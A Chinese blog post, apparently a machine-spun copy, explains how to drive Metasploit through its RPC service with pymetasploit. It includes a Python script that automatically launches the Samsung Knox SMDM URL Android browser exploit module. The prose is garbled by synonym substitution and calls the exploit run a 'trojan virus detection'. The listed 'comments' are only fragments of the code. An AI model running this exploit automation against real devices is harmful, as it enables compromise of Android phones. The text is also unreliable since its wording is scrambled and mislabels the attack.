Metasploit快速测试脚本的TIPS
坚信试过metasploit的同班都很悲催,msfconsole悠长的开机时间,假如检测中敲错指令,或不慎撤出后又重新启动任務,会给你立即抗爹。以前不愿反复敲指令,看过下metasploit的开发文档,发觉要智能化有各类预案,我觉得最便捷的是启用RPC插口,GITHUB上搜了把,发觉有大拿封裝好啦模快,立即启用只能:
安裝pymetasploit模快
git clone https://github.com/allfro/pymetasploit
拷贝编码
切到文件名
sudo python setup.py install
拷贝编码
起动metasploit的RPC业务
msfrpcd -P test -n -f -a 127.0.0.1
拷贝编码
这一test是rpc业务的PIN码,登录名初始是msf
订制自身的检测角本
我这儿订制的是检测三星knox木马病毒的角本,构思是每一次起动先把以前运作的job和console停用,随后自動建立1个console自動敲入指令开展新的木马病毒检测,立即crtl-c完毕角本再再次检测全是1个新的job,并且每一次检测全是秒开,无需再重新启动msfconsole了。里面各类插口如何使用,推介大伙儿再翻下管方的word表格。
from metasploit.msfrpc import MsfRpcClient
import time
client = MsfRpcClient('test')
jobs = client.call('job.list')
for num in jobs.keys():
if jobs[num].find('samsung_knox_smdm_url')>0:
client.call('job.stop',num)
console = client.call('console.list')
for _console in console['consoles']:
if _console.has_key('prompt'):
if _console['prompt'].find('samsung_knox_smdm_url')>0:
client.call('console.destroy', _console['id'])
cmd='''
use exploit/android/browser/samsung_knox_smdm_url
set LHOST 127.0.0.1
exploit
'''
res = client.call('console.create')
console_id = res['id']
client.call('console.write', console_id, cmd)
try:
while True:
res = client.call('console.read',console_id)
if len(res['data']) > 1:
print res['data'],
if res['busy'] == True:
time.sleep(1)
continue
except:
pass
相关文章
- 5条评论
- 嘻友岛徒2022-05-30 19:16:01
- 'data']) > 1: print res['data'], if res[
- 野欢秋酿2022-05-30 20:33:05
- _console['id'])cmd='''use exploit/android/browser/samsung_knox_smdm_urlset LHOST 127.
- 拥嬉二奴2022-05-30 19:44:29
- bsp; if _console.has_key('prompt'): if _con
- 纵遇拥野2022-05-30 20:44:00
- bs[num].find('samsung_knox_smdm_url')>0: client.call('job.stop',num)console = client.call('conso
- 语酌寻倌2022-05-30 22:45:37
- lient.call('job.stop',num)console = client.call('console.list')for _console in console['consoles']: